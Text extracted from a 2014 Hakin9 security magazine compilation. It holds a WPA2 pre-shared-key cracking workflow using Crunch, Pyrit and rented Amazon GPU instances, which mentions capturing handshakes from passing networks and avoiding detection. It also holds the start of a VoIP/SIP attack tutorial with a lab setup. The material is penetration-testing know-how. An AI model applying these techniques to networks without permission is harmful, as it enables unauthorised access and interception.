Sei sulla pagina 1di 76

F

r
e
e

A
r
t
i
c
l
e
s

f
r
o
m

H
a
k
i
n
9
IN SOME CASES
nipper studio
HAS VIRTUALLY
REMOVED
MANUAL AUDIT
CISCO SYSTEMS INC.
the
NEED FORa
Titanias award winning Nipper Studio confguration
auditing tool is helping security consultants and end-
user organizations worldwide improve their network
security. Its reports are more detailed than those typically
produced by scanners, enabling you to maintain a higher
level of vulnerability analysis in the intervals between
penetration tests.
Now used in over 45 countries, Nipper Studio provides a
thorough, fast & cost effective way to securely audit over
100 different types of network device. The NSA, FBI, DoD
& U.S. Treasury already use it, so why not try it for free at
www.titania.com
www.titania.com
UP DAT E
NOW WITH
S T I G
AUDITING
Editor in Chief: Ewa Duranc
ewa.duranc@hakin9.org
Managing Editor: Krzysztof Samborski
krzysztof.samborski@hakin9.org
Editorial Advisory Board: Gaereth Watters, John Webb
Special Thanks to the Beta testers and Proofreaders who helped
us with this issue. Without their assistance there would not be a
Hakin9 Magazine.
Publisher: Pawe Marciniak
CEO: Ewa Dudzic
ewa.dudzic.@hakin9.org
Marketing Director: Krzysztof Samborski
krzysztof.samborski@hakin9.org
Art. Director: Ireneusz Pogroszewski
ireneusz.pogroszewski@hakin9.org
DTP: Ireneusz Pogroszewski
Publisher: Hakin9 Media sp. z o.o. SK
02-676 Warszawa, ul. Postpu 17D
NIP 95123253396
www.hakin9.org/en
Whilst every effort has been made to ensure the highest qual-
ity of the magazine, the editors make no warranty, expressed
or implied, concerning the results of the contents usage. All
trademarks presented in the magazine were used for informa-
tive purposes only.
All rights to trademarks presented in the magazine are reserved
by the companies which own them.
DISCLAIMER!
The techniques described in our magazine may be used in
private, local networks only. The editors hold no respon-
sibility for the misuse of the techniques presented or any
data loss.
www.uat.edu > 877.UAT.GEEK
[ ITS IN YOUR DNA ]
[ GEEKED AT BIRTH ]
You can talk the talk.
Can you walk the walk?
LEARN:
Advancing Computer Science
Artifcial Life Programming
Digital Media
Digital Video
Enterprise Software Development
Game Art and Animation
Game Design
Game Programming
Human-Computer Interaction
Network Engineering
Network Security
Open Source Technologies
Robotics and Embedded Systems
Serious Game and Simulation
Strategic Technology Development
Technology Forensics
Technology Product Design
Technology Studies
Virtual Modeling and Design
Web and Social Media Technologies
Please see www.uat.edu/fastfacts for the latest information about
degree program performance, placement and costs.
5
THE BEST OF
Copyright 2014 Hakin9 Media Sp. z o.o. SK
Table of Contents
Using Amazon AMI for Cracking the WPA2 WiFi Hack .........................................................9
by Bruno Rodrigues
VoIP Hacking Techniques ...........................................................................................................16
by Mirko Raimondi
A Crash Course in Pentesting with Backtrack .........................................................................33
by Nick Hensley
Using Hydra To Crack The Door Open ....................................................................................53
by Nikolaos Mitropoulos
NMAP and Metasploit for MS-SQL Auditing ..........................................................................61
by Jose Ruiz
Nmap: a Hacker Tool for Security Professionals .................................................................76
by Justin Hutchens
How To Reverse Engineer .NET files ........................................................................................88
by Jaromir Horejsi
Digital Forensics on the Apple OSX Platform .........................................................................93
by David Lister
Passwords Cracking: Theory and Practice .............................................................................100
by Theodosis Mourouzis
How to Use OpenVAS (Vulnerability Assessment System)? ..................................................107
by Willie Pritchett
How Do I phish? Advanced Email Phishing Tactics ...............................................................117
by Brandon McCann
How to Brute-force Drupal6 Login Pages?..............................................................................124
by Kevin Simons
How to Conduct VPN Pivoting? ...............................................................................................135
by Ayman Hammoudeh
Cracking WPA/WPA2 Key Using Reavar ...............................................................................140
by Badrish Dubey
How to use Socat and Wireshark for Practical SSL Protocol Reverse Engineering? ..........146
by Shane R. Spencer
THE BEST OF
6
How to Identify and Bypass Anti-reversing Techniques? ......................................................153
by Eoin Ward
Capturing WiFi traffic with Wireshark ...................................................................................165
by Steve Williams
Wireshark/LUA ..........................................................................................................................175
by Jrg Kalsbach
Tracing ContikiOs Based IoT communications over Cooja simulations
with Wireshark Using Wireshark with Cooja simulator ........................................................181
by Pedro Moreno-Sanchez and Rogelio Martinez-Perez
Digital Security and Risk Analysis Side Channel Attack
with Brain Leading to Data and ID Theft ...............................................................................190
by Massimiliano Sembiante
Raspberry Pi Hacking Loving your pi and hacking it too .................................................199
by Jeremiah Brott
Bluetooth Hacking Tools............................................................................................................220
by Dennis Browning
Create a Basic Web Application Scan Policy ...........................................................................227
by Johan Loos
Create a Basic Scan Policy in Nessus 5 ....................................................................................233
by Johan Loos
Cross-Site Scripting (XSS) ........................................................................................................238
by Badrish Dubey
Implementing Rsylog to forward log messages on an IP network .........................................247
by Lara Sanz
Weak Wi-Fi Security, Evil Hotspots and Pentesting with Android .......................................253
by Dan Dieterle3
Pentesting with BackTrack distribution ..................................................................................261
by Jan Hrach, Miroslav Ludvik, Michal Srnec
Use Metasploit in Backtrack 5 ..................................................................................................270
by Johan Loos
Using REMnux to analyze PE files ...........................................................................................280
by Glenn P. Edwards Jr
Recovering Passwords and Encrypted Data Remotely in Plain Text ....................................285
by Daniel Dieterle
Trojan-izing USB Sticks ............................................................................................................291
by Gerasimos Kassaras
THE BEST OF
7
Deceiving Networks Defenses with Nmap Camouflaged Scanning .......................................296
by Roberto Saia
Cross Site Request Forgery Session Riding ..........................................................................308
by Miroslav Ludvik and Michal Srnec
Data Logging with Syslog A Troubleshooting and Auditing Mechanism..............................315
by Abdy Martinez
Caffe Latte Attack ......................................................................................................................323
by David Jardin
Reverse Engineering C++, a case study with the Win32/Kelihos Malware Family .............330
by Benjamin Vanheuverzwijn, Pierre-Marc Bureau
Cyber Warfare Network Attacks ..............................................................................................339
by Daniel Dieterle
Understanding conditionals in shellcode .................................................................................346
by Craig Wright
Creating a Fake Wi-Fi Hotspot to Capture Connected Users Information..........................355
by Roberto Saia
Accurate Time Synchronization with NTP Hardening your Cisco IOS Device ...................367
by Abdy Martinez
DNS Cache Poisoning ................................................................................................................373
by Jesus Rivero
Beyond Automated Tools and Frameworks: the ShellCode Injection Process ....................381
by Craig Wrigh
Tabnapping Attack Hijacking Browser Tabs ..........................................................................389
by Abdy Martinez
Using the Social Engineering Toolkit to Test Network Security ............................................396
by Daniel Dieterle
Starting to Write Your Own Linux Shellcode .........................................................................404
by Craig Wright
How to Recover Passwords from a Memory Dump ................................................................411
by Daniel Dieterle
Tag: Youre Infected! QR Codes as Attack Vectors ................................................................417
by Tim Klup
THE BEST OF
8
Dear Hakin9 Readers!
W
e are glad to present our first THE BEST OF HAKIN9 in 2014. This time we wanted to
sum up last 3 years of our work and thus, we prepared a special collection of 48 top Hakin9
articles. Inside you will find more than 400 pages of how-to and step-by-step tutorials
that will surely contribute to your development as a professional pentester, exploiter or ethical
hacker.
We hope that this pack will shed some light on the direction our publication took after it underwent
major changes such as switching to electronical version (.pdf and .epub formats) or focusing mostly
on exploiting and hacking techniques and tools.
This compendium is also a fine introduction to even greater changes in our magazine as it shows
You, our Reader, the topics that are most burning and eagerly read by Hakin9s audience. We
decided to stress the need to meet your high expectations and, in the forthcoming publications,
supply You with recurring issues of the topics as Exploiting Software, Reverse Engineering,
Pentesting, Offensive Programming, Network Cracking.
We hope You find these changes proper and satisfactory. We strongly encourage all of You to send
us many messages about your needs and expectations as this publication is devoted to You and
would not exist without its Readers. Please remember that we are always open to Your ideas and it is
You, who decide on the following topic of Hakin9.
Feel free to share your views and comment on our recent and future work by sending us a message
to en@hakin9.org with COMMENTS in the subject. We respond to all your inquiries.
We wish you a good read,
Krzysztof Samborski
and Hakin9 team
THE BEST OF
9
Using Amazon AMI for Cracking the
WPA2 WiFi Hack
by Bruno Rodrigues
Let me start by sharing a little bit of programmers humour: some programmers decided to
humour us and inserted the following text when something goes wrong with our Youtube
request (500 Internal error) Sorry, something went wrong. A team of highly trained
monkeys have been dispatched to deal with this situation.
Now, you are probably asking: what does this have to do with Wi-Fi hacking? Are we hacking Youtube? NO!
Is the solution to Wi-Fi hacking in Youtube? Probably! But this article is not about that. This article is about
how we can efficiently hack Wi-Fi networks WPA2 protected in an efficient way.
So where do the trained monkeys and the Wi-Fi networks combine? First, Youtube is massive, a lot of code
and systems on distributed infrastructures; second, its highly unlikely that one error spotted by a user might
be spotted by any system admin or programmer; third, even if the error is relevant Youtube will not be
sending anyone to check the error physically.
What Im saying is that a global infra-structure, such as Youtube, looks at errors on a global, performance
and security scale and spans resources as required, over multiple systems, to load balance performance and
security. No one really looks at specific particular cases but, instead, uses their resources solve global events
that impact global cloud systems.
Based on this, Ive decided to create a new approach to handle the WPA2 hacking process. As a Security Auditor
I keep pushing reports saying that Wi-Fi can, potentially, be a weak entry point and therefore needs extra caution
regarding network design. But how safely are we using a Wi-Fi network with WPA2 pre-shared key?
At this point, its important to notice that WPA2 as it stands, wasnt broken. Also, we are looking at a scenario
where poor Wi-Fi security measures are in place. Nevertheless, I believe that this setup counts for most of the
Wi-Fi deployments out there. Also, if a protocol isnt broken doesnt mean it isnt hackable. Thats what I want
to show you, using a new approach, where resources are potential unlimited and cost effective.
So, how can WPA2 be hacked? We can brute force the password against the Wi-Fi network (for now, lets
keep the concept global). This has been proven time consuming and resource intensive and therefore not
very effective. Let me show you why. Lets take a look at whats available.
First, create a word list and brute force the handshake to death. Now, if you read a little bit about this
attacks, most of them will tell you that the only way you might achieve such stunt would be to do some
reconnaissance (like the companys website) and use most of the words found to create a combination
of words that might get you lucky. I dont believe in luck hackers do their own luck. So lets see what
happens when we try to create a word list that will open any network with and WPA2 key of 8 characters
(Alphanumeric upper and lower case):
Figure 1. Crunch Word list creation
Whoa! Theres no way this will fit on my external hard drives. Even if we get an external source to host
this files, were talking about costs NSA style that normal mortals wont have to spend. I guess most
readers must be thinking What the hell is this guy doing? I agree, but stay till the end. This is just a walk
into the past so we can understand the future, and believe me, its a bright future.
THE BEST OF
10
So, normal word list with Crunch is out of the question. But wait, why dont we pipe Crunch into Pyrit
anyway? Would that make a difference?
A few words about the above command: we are saying to Crunch to generate all combinations of 8
characters, where we have provided the characters to use (its just easier if I pick all the characters I know
and it will get the job done), piping the results to Pyrit that will use them (-i -) to pass through the attack to
the .cap file for the Wi-Fi test network (SSID).
As you can see around 2000 PMKs per second would take us years to brute force, making it a not so viable
way to hack WPA2 Wi-Fi networks. I found this link over the internet that can explain the magnitude of time
it would take http://www.lockdown.co.uk/?pg=combi. I know that youll probably think this is not how you
do it. You probably need to go for CUDA Pyrit. And youre right. For now I just want to show you that the
normal Desktop/laptop just wont cut it.
There is no efficient way to do it. No efficient way on how to do it. This is the part where I lay down my
method. And no, we wont be using CUDA at this stage, since we wont be talking about the 5 Trained
Monkeys yet (and they hold hands together). So, whats the method? And why are we using Pyrit?
The reason is simple: Pyrit uses an awesome feature that allows you to attack a capture using a pre-loaded
database. And why is that relevant? Because it does it by the millions per second, and because we can start
the process of our rainbow tables. In one word, it ESCALATES. Meaning we can potentially break any
length WPA2 password and I always wanted to get my hands on this solutions.
So, lets see how my poor laptop does when first create the words and then import them to a database.
We are still going to stick with Crunch and Pyrit. Pyrit comes with a pre-installed database out of the box
that you can use. Still, I leave it to you to connect to external databases that can escalate much better than the
ones on my PC.
Based on what we did previously, well going to make this in 3 steps:
Create the word list based on the same characters used before
Figure 2. First step
Upload the word list to Pyrit DB we are going to give a value to option -i in Pyrit
Figure 3. Second step
THE BEST OF
11
Create the batch and attack
Figure 4. Third step
As you can see, the process is quite fast after we get the batch running. Still, the batch took about the same
time to run than the pipe approach, so it still doesnt give me the flexibility and scalability I want as a hacker.
I want to be able to do it in a couple of hours maximum and be able to escalate the number of characters in
the combinations in a near future.
So, the next normal step is for us to arrange for computing power. In reality thats whats lacking right now:
get the batch process to be faster (we still need to figure out the amount of data generated by Crunch as
seen in the beginning of this article, but well get there later). Should we be thinking of going right now to
Amazon and buy the new brand PC with a powerful Nvidia card? Well we could but Im not sure how that
can be a scalable flexible solution.
On the topic of Amazon and back with the five trained monkeys... How about getting a solution that scales,
and is flexible, cost effective and, like the trained monkeys, will do the work on a scale that no one can
actually control? Its time to bring out the big guns and get the Ferrari out. At least rent one.
I give you EC2 AMIs. Amazon just roll out a couple months ago some AMIs dedicated to high processing
performance, based on the use of GPUs instead of CPUs (that will get the job better done), at a fractional
hourly price that we can afford. I give you the G2 instances. And yes, now the trained monkeys are in control.
As you can see, for less than a dollar for one hour we get a machine with all the power we need. I must say,
that it took me a while to get the username (ec2-user) for the AMI, stating here Amazon its NOT CLEAR
whats the user name. Never the less, got it running and updated and you wont believe how fast it was
22Mbs bandwidth and a lot of processing power.
Regarding Amazon AMIs, I could take all article and expand on this, since theres a lot to say. Nevertheless,
its up to you to understand the different options available and instances that you can use. Also, remember that
not all instances are available worldwide. Not that I think that region would be important on the hacking we are
doing. Most of the information I found online points for the use of Amazon own AMIs. Again, its up to you.
Figure 5. Amazon Lnux AMI with NIVIDA GRID GPU Driver
THE BEST OF
12
The AMI we are using comes empty and, therefore, we need to put all that tools we require in.
For a job well done, well require Python 2.5, CUDA Pyrit and Crunch. Only then well be able to put this
baby to the test. For now, Ill assume that you, the reader, have the knowledge to do the above or, at least,
have a Master in Google search, where you can find all the information you require doing it.
This article is not about getting Crunch and Pyrit and, therefore, I wont go deep into it. Lets just say that
some users out there did us the favour of compiling some interesting scripts that will allow us to get Pyrit
(and some other bonus tools) up in running in seconds. Thats the power of the AMI: huge bandwidth and
computer power.
For performances sake, Ive decided to run Pyrit benchmark test and the results are just awesome.
Things are looking good. We should now see how much faster we can crack our test network. First Ill pipe
Crunch to Pyrit and then Ill use the built-in database to attack the .cap file.
Figure 6. Attacking the .cap file
We finally got where we need to reset our mind. Im telling you this because you, reader/hacker, by now, saw
that all the methods used wont actually solve our problem. We still can hack into, potentially, any WPA2
passphrase length. It still takes too much time and, therefore, it doesnt escalate. Untill now, and youll find some
documentation online about this, all theories point to the use of Crunch to create a huge word list and Pyrit, using
distribution loads to other AMIs. Now I didnt talk about this because I still believe that wont make it anyway.
About that reset and the 5 monkeys, lets see what the Cloud can provide us (and by cloud I here launch
the next Quest on what other clouds did you were able to run the same project? Send me your feedback for
I am anxious to know). It gives us the flexibility by allowing us to use worldwide multiple AMIs or VMS;
It allows us to just pay by the hour usage, so we can actually turn off and leave it off till we need to use it; It
allows us to create a machine, leave it off with no charge associated and create new VMS from it.
The last paragraph its of the upmost importance. Lets try to do a mental game and see how we can use all
the tools described till now and combine them with the advantages mentioned above. Did you get there?
Need 5 more minutes? Let me help you structure your mind and define a new strategy for WPA2 cracking.
What if we could break the Crunch/Pyrit process in small bits and still use the DB feature that allows us to
attack much faster? That would mean creating multiple VMS pre-loaded with Pyrit and a small part of the
word list/database loaded onto it. That means that by running multiple VMS well be able to crack the WPA2
in a short period, since each VM is just processing part of the load. By the end, all the VMS have processed
all the possible combinations. Also, this method will allow us to escalate as far as we can go. We just need to
add a new VM or VMS that will ease the load on the other machines. And for the hourly cost, believe me, we
can grow and grow. Besides that, we can use the power of templates, so we dont have to start from scratch
every time we need to crack a Wi-Fi Network. The batch still needs to run, since the SSID will change, but
the password list that each VM has loads and all the work required can be done prior to any hacking.
The storage problem is also gone. Load and space we can escalate, giving us the cost flexibility we need.
We just need to do our homework prior to loading the .cap file, set the SSID and run the batch. The password
list will be already pre-loaded on the template from where we create the VM.
THE BEST OF
13
Technically speaking, lets walk step by step so you can see the wonders of what we are doing. This time,
and because Ive already mention it, Ive decided to go with a different AMI so you can see the different
options available. Also be careful about the example you choose, as many options have different prices
and performances. I went with an AMI from Amazon GPU prepared and the g2x2large example more
expensive but definitely worth it.
Figure 7. GPU instances
Step one
get the right tools for the job. Again, I wont waste time here since I believe that the hackers that kept
reading until now understand the power of Google and will be able to do this in a heartbeat. Remember that
this wont be your production machine but, instead, a template we are creating so we dont have to do part of
the process every time we want to hack a Wi-Fi network. Also, it will allow us to construct our 5 Monkeys
model, where resources are spanned and not physical.
Step two
Create a small fraction of the word list. Now, this is where it got trick. Never the less and after going through
Crunch manual we figure out a way to break the word list in small pieces. It actually breaks it to a maximum
file size and gives it a name, allowing us to re pick where it stopped and create from there on. If you notice
the -c option youll see Ive chosen a huge value so Pyrit could actually tell me which maximum value I
should use.
Figure 8. Pyrit warning
In this example well be creating all combinations, upper and lower cases, with all the numbers 1 to 8
characters. As you can see Crunch will be responsible for creating the file names. Well then change the
command to re-pick where Crunch left off and start creating a new set of files. He just needs to keep an eye
for the number and size of files created and stop before we run out of space. Then, we just launch a new VM
when we want to continue and start from where we left off. Well just going to overlap the last file created.
Figure 9. Crunch
Pay attention to the last sequence in file name: xxxxx-yyyyy.txt. Youll need to correct the minimum number
of characters on the crunch command to match the number of yyyyy.
THE BEST OF
14
Step three
Upload all the files to Pyrit database. Another way you have to do it, would be to generate the word files on
your local computer and upload them to the VM. You have the bandwidth so why use the storage for more
than a database. This way you wont take space with useless files. Youll upload to one VM and place it
directly on Pyrit and do a manual distribution to other VMS. You can schedule the time and leave it running
during the night, since youll probably have more cheap storage attached on your computer.
Step four
Save the VM as a template. This step is pretty easy and straightforward. You just go to your EC2
management console, choose the instance you want (in this case all the instances created are pre-loaded with
the word lists) give it a name (my advice would be to choose something like nameoffirstfile-nameoflastfile
so you know what this VM is supposed to process) and choose create image.
Step five
Launch all the instances, insert the ESSID in Pyrit and run the batch.
Step six
Upload the cap file and attack it with Pyrit DB. I just want to add a note off-topic in this step (Im using
an Android application on my phone called Linux Deploy that allow us to install Kali Linux ARM version
pretty easy). You can then, when walking down the street, get a perfect cap file for the handshake of any Wi-
Fi network that you encounter, scp the file to Amazon cloud and let the Monkeys do the work for you. After
all they are trained.
Youll notice that all the steps might take some time, like the word creation, VM creation and upload to
Pyrit database but in fact you just doing it once, saving it as a template and creating new VMS from the
ones previously created. It will take you some time, but youre doing a kind of Rainbow tables for Wi-Fi so
expect some work prior to attack and cracking.
As you can see, all the tools and servers mention are not new to us, Hackers. Its a matter of using some
of the available tools and redefine the strategy we will use to attack whatever we can attack, make it more
efficient and faster. My challenge here was to see how the mental process can be built and hope that the
readers might think about other attacks or hacks that although being new, with a different strategy, might get
you in where it wasnt possible before.
New tools, new clouds and processing power will keep emerging and we hackers have to start thinking
how we can leverage a good technology and give it the power it needs to achieve what we want. Also, this
strategy defined here will probably go undetected. The capture and the cracking occur in different moments,
and the cracking itself wont raise any flags anywhere. Not even on Amazon.
I just hope that if you Security Guys from Amazon are reading this, that you understand that we wont be
using this for bad things. Keep in mind that we should only use this technique for Authorized testing or
educational purposes. Always get permission or use your own network, before you start cracking.
About the Author
Bruno Rodrigues is an enthusiastic network engineer with the necessary drive and
determination needed to resolve complex networking issues. Possessing effective
organizational skills and excellent working knowledge of networking technologies and
having a commitment to keep up to date with the latest developments. Experienced in
providing motivation, guidance and an up to date networking consultancy service to both
colleagues and clients.
cigital
SecureAssist
Find and Fix Security Defects
During Development
Plug-in for Eclipse and Visual Studio identifes common
security vulnerabilities and provides remediation guidance
Contextual
Guidance and examples
specifc to the language
Customizeable
Incorporate organizational
standards into guidance
Expert validated
Based on Cigitals experience in
thousands of code reviews
Actionable
Code examples explain the right
way and place to fx defects
Free 30-day trial: www.cigital.com/hakin9
THE BEST OF
16
VoIP Hacking Techniques
by Mirko Raimondi
The Public Switched Telephone Network (PSTN) is a global system of interconnected, various
analog sized phone networks which provides users the capability to carry voice conversations
with each other. Initially, the most basic analog network service, called POTS (Plain Old
Telephone Service), uses a pair of twisted copper wires in order to connect a residential phone
to a central office from where a residential customer can dial out in the PSTN.
What you will learn...
basics of VoIP network protocols
how to attack a VoIP network
how to defend a VoIP network
What you should know...
basics of networking
Initially, the PSTN was a simple one-to-one telephone line connecting phones from one room to another.
When telephone business grew up, Private Branch eXchanges (PBX) were designed, and deployed in office
settings to provide the increasing of telephone lines and to connect internal callers (over trunk lines) through
either the PSTN or eventually to destination callers. When PSTN became digital, a method called Time
Division Multiplexed (TDM) was created. TDM transmits and receives independent signals over a common
signal path by means of synchronized switches at each end of the transmission line, in this way each signal
appears on the line only a fraction of a time in an alternating pattern.
Voice over Internet Protocol (VoIP) is a newer technology that allows phone conversations to be transferred
over the computer networks, it transforms analog and digital audio signals in data packets. VoIP usually
refers to communications multimedia applications which are transported via Packet-Switched Network
(such as Internet) instead of the PSTN. VoIP has seen rapid implementation over the past few years, many
users choose the VoIP to leave behind the traditional telephonic providers in order to pay cheaper bills;
for companies using VoIP is an easy way for communication between their several branches and for their
teleworking employees.
An example of a simple VoIP network can be seen in Figure 1 where VoIP works as a private telephone
network and it is transparent to the PSTN. Software Phones (also said Softphones), IP Phones and Analog
phones (which must use VoIP adapter) can connect to a PBX, where internal telephone are connected to
public lines or other VoIP systems on the Internet. Using VoIP Media Gateway, a VoIP phone can call a
legacy phone on the PSTN and vice versa with no problems since Media Gateway translates the IP packets
into TDM.
VoIP services are often taken in use but their security threats are analyzed only under specific aspects or not
taken in consideration at all. This article analyzes the most common VoIP threats in order to identify existing
weaknesses and suggests available countermeasures. For each threats an example of attack is reported and
explained since, in authors opinion, the knowledge of the tools that could be used by attackers is important.
In this way the VoIP current situation will be analyzed from attackers point of view to discover the most
vulnerable parts of the system. The results of this article could be used by system administrators, network
engineers and penetration tester in order to examine their VoIP systems.
The author of this paper discharge all responsibilities for an inappropriate use of the information here
reported and suggests to try these attack techniques only in controlled environments, like test plants,
and with previous authorization of the owner.
THE BEST OF
17
VoIP Fundamental Protocols
VoIP telephony uses mainly two protocols in order to set up a call and to transport Audio/Video signal.
Theyre described in the following subsections.
Real-Time Protocol (RTP)
The Real-time Transport Protocol (RTP) is a standardized packet format used by IP networks in order to
deliver audio/video signal. RTP was developed by the Audio/Video Transport working group of Internet
Engineering Task Force (IETF) standards organization, it was initially described in IETF RFC 1889 and then
superseded by IETF RFC 3550. It was designed for end-to-end, real-time, transfer of stream data and its
regarded as the primary standard for audio/video transport in IP networks and it is used with an associated
profile and payload format.
Figure 1. Classic VoIP network scenario
RTP is used in conjunction with the Real-Time Control Protocol (RTCP) which is used to monitor transmission
statistics and Quality of Service aiding synchronization of multiple streams. While RTP is originated and
received on even port numbers, the associated RTCP packets use the next higher odd port number.
The protocol provides facilities for jitter compensation (jittering is rather common on a Packet-Switched
Network since communication is provided by network Routers), detection of out of sequence arrival in data
and allows data transfer to multiple destinations through IP multicast.
Real-time applications require timely delivery of information and can tolerate some packet loss usually than
an excessive delay. Thus, in order to achieve this goal the Transmission Control Protocol (TCP) is normally
not used by RTP since TCP favors reliability over timeliness, RTP systems are instead usually built on the
User Datagram Protocol (UDP).
The audio sampling rate is typically either 8000Hz or 16000Hz and the rate that RTP packets are transmitted
is determined by the audio Codec by mean of its Packetization Period. Whether those packets actually arrive
at a fixed rate at the receiving endpoint depends on the network performance. RTP packets might be lost
by Routers, might arrive at the receiving endpoint out of sequence, or could be even duplicated when they
transit through the network.
THE BEST OF
18
Hence receiving endpoints are designed with the assumption that RTP packets will not arrive at the precise
rate they were transmitted. About this reasons an endpoint incorporate a Jitter Buffer having parameters
in order to manipulate the characteristics of time buffering in an attempt to produce the highest Quality of
Service during the playback. Jitter Buffer uses RTP header information to accomplish its functions.
Session Initiation Protocol (SIP)
SIP is being developed by the SIPWorking Group, within the IETF, the protocol is published as IETF RFC
2543. SIP is a telephone signaling protocol used by VoIP in order to initiating, managing and terminating
voice sessions in Packet Switched Networks. SIP sessions involve one or more participants and can use
either unicast or multicast communication. SIP is text-encoded and highly extensible since it may be
extended to accommodate features and services such as call control services, mobility and interoperability
with existing telephony systems.
That are 4 types of logical SIP entities, each one participates in SIP communication as a client (the entity
which initiates the Requests), as a server (the entity which Responds to Requests), or as both. One network
device can have the functionality of more than one logical SIP entity. In the following the 4 types of logical
SIP entities are reported:
1. USER AGENT (UA): initiate and terminate sessions by exchanging Requests and Responses. UA is an
application, which contains both a User Agent Client (UAC) and User Agent Server (UAS). UAC is a
client application that initiates SIP requests while UAS is a server application that contacts the user when
a SIP request is received and that returns a response on behalf of the user. Devices with UA functions are:
workstations, IP-phones, Media Gateways, call agents and automated answering services;
2. PROXY SERVER: intermediary entity that acts as both a server and a client with the purpose of making
Requests on behalf of other clients. Requests are serviced either internally or by passing them on (possibly
after translation) to other servers. A Proxy interprets and, when its necessary, rewrites a Request message
before forwarding it;
3. REDIRECT SERVER: server that accepts a SIP Request, maps the SIP address of the called party into
zero (if there isnt known address) or more new addresses and returns them to the client. It does not not
pass the Request on to other servers;
4. REGISTRAR: accepts REGISTER Requests in order to updating a location database with the contact
information of the user specifed in the Request.
There are two types of SIP messages:
1. Request Messages: theyre sent from the client to the server;
2. Response Messages: theyre sent from the server to the client.
In the following Request Messages types are reported:
INVITE: initiates a call and it can changes call parameters, in this case its called re-INVITE;
ACK: confrms a fnal response for the INVITE message;
BYE: used in order to terminate a call;
CANCEL: cancels searches and ringing;
OPTIONS: queries the capabilities of the other side;
REGISTER: used to register with the Location Service;
INFO: sends mid-session information that does not modify the session state.
THE BEST OF
19
Response Messages contain numeric codes, there are 2 types of responses and 6 types. In the following the
Response types are reported:
1. Provisional: its own class is1xx, this kind of responses are used by the server to indicate a progress state
but they cant terminate SIP transactions;
2. Final: its own classes are 2xx, 3xx, 4xx, 5xx, 6xx, this kind of responses terminate the SIP transactions.
The different types of classes, divided by their prefix number, are reported in the following:
1xx: provisional, searching, ringing and queuing. Two examples of these messages are 100 Continue and
180 Ringing;
2xx: success. An example is the message is 200 OK;
3xx: redirection and forwarding. Examples are messages 301 Moved Permanently and 302 Moved
Temporarly;
4xx: request failure for client mistakes. The messages 400 Bad Request and 408 Request Time-Out are
two examples of these messages;
5xx: server failures.
6xx: global failure such as busy, refusal, not available. The messages 600 Busy and 604 Does Not Exist
are two examples.
SIP messages are composed of 3 parts:
1. Start Line: each SIP message begins with this part. The Start Line conveys the message type (method
type in Requests and Response code in responses) and the protocol version. The Start Line may be either
Request-line (request message that includes a Request URI, which indicates the user or service to which
this request is being addressed. Unlike the To feld) or Status-line (response message which holds the
numeric Status-code and its associated textual phrase);
Figure 2. Trivial SIP session
2. Header Fields: used to convey message attributes and to modify message meaning. Like an HTTP
request from a browser is made using an URL, SIP uses an e-mail like addresses which typical format
is: user/phone@domain/ip. They can span multiple lines. Some SIP headers such as Via, Contact, Route
and Request-Route can appear multiple times in a message or, alternatively, can take multiple comma-
separated values in a single header occurrence;
3. Body: this is the content of the message and is used to describe the session to be initiated, this may include
audio and video codec types that, sampling rates, etc.; It alternatively may be used to contain opaque
textual or binary data of any type which relates in some way to the session. Message bodies can appear
both in Request and in Response Messages. Possible body types include: Session Description Protocol
(SDP) and Multipurpose Internet Mail Extensions (MIME).
Figure 2 shows a trivial SIP session, registered by mean of a Network Analyzer called Wireshark, that
reports an interaction between a UAC and a UAS which is established and then terminated. UAC has IP
address 192.168.101.190 and UAS has 192.168.101.105. In particular packet 421 is an INVITE Request
Message sent to the user 1000. Then, the Response Message packets 423 and 424 belonging to class 1xxx,
THE BEST OF
20
said respectively a call continuation and the ring back tone. After about 10 seconds the called user answer is
stated by packet 647 which reports a Response Message OK belonging to the class 2xxx, now the telephone
call is established. The telephone call duration is about 40 second, then the caller hang up the telephone, it is
stated by packet 4985 which reports a BYE Request Message in order to close the call.
Figure 3 reports a detail of the packet number 421 which is registered again by mean of Wireshark. Its an
INVITE Request Message where Start Line, Header Fields and Body are clearly visible.
Overview of Common VoIP Attacks
In the following, an overview of common VoIP attacks is reported. Each attacks is executed by mean of a
dedicated hacking tool on Linux OS platform. Before to develop and explain the attacks, lets have a look to
the test plan realized by the author in order to develop VoIP exploitation examples.
Figure 3. SIP INVITE details
Test Plant Characteristic
A basic Local Area Network scenario was developed in order to execute and explain VoIP attacks reported in
this article. Network devices and platform involved in this test plant are described in the following:
UAS Ubuntu 12.04.3 Server with Asterisk 1.6.2.24 PBX IP address 192.168.101.105/24, UDP port
5060;
UAC #1- Ubuntu 12.04.3 Server with Zoiper softphone IP address 192.168.101.105/24, UDP port
37268 extension 1000 password authentication: mypasswd1;
UAC #2 Windows 7 OS with X-Lite softphone IP address 192.168.101.190/24, UDP port 5060 extension
1234 password authentication: youpasswd;
UAC #3 Linux Mint OS with ZoIPer softphone IP address 192.168.101.108/24, UDP port 47723 extension
2000 password authentication: mypasswd2;
Attacker Linux Black Ubuntu IP address 192.168.101.191/24;
Network Device DELL Switch 2748
Information Gathering
In previous section the features of network devices was reported by the author in order to help the reader
to understand the following example, but in the reality the network administrator would like to hide that
information in order to make harder any attack. In this way an attacker, with its only strengths, must to discover
all information about the network features before to start any kind of attack, this is always the first phase of
THE BEST OF
21
any attack and is called Information Gathering: the attacker gathers information about network devices in order
to learn as much information as he can. In particular the attacker could be interested about: network hosts,
network servers, PBXs types and versions, VoIP Media Gateways, SIP clients types and versions.
Several free tools could be used by an attacker to accomplish this action: SMAP, SIPSAK, SIPSCAN
and SVMAP. The author will use SVNMAP, it belongs to a suite of SIP tools called SIPVICIOUS (others
tools of this suite will be treated in the following sections). Some SVMAP capabilities are reported in the
following list:
scan identify and fngerprint a single target IP, an IP range or even an entire subnetwork;
network interface and local port selection for outgoing packets;
identify SIP devices and PBX servers on default and non-default ports;
scan just one host on different ports, looking for a SIP service on that host or just multiple hosts on
multiple ports;
take previous scan results as input, allowing you to only scan known hosts running SIP;
use different scanning methods (OPTIONS, REGISTER, INVITE, etc.);
get all the phones on a network to ring at the same time (using INVITE as method);
randomly scan internet ranges resume previous scans.
SVMAP allows specifying the request method that will used for scanning (which is by default the OPTIONS
method), you can specify a different method to scan with, such as REGISTER and INVITE (Attention
please! INVITE method can be noisy and generate a ring at the other end). The list of usable methods is
reported in the following:
INVITE: a client is being invited to participate in a call session;
ACK: confrms that the client has received a fnal response to an INVITE request;
BYE: terminates a call and can be sent by either the caller or the callee;
CANCEL: deletes any pending request;
OPTIONS: queries the capabilities of servers;
REGISTER: registers the address listed in the To header feld with a SIP server;
PRACK: provisional acknowledgement;
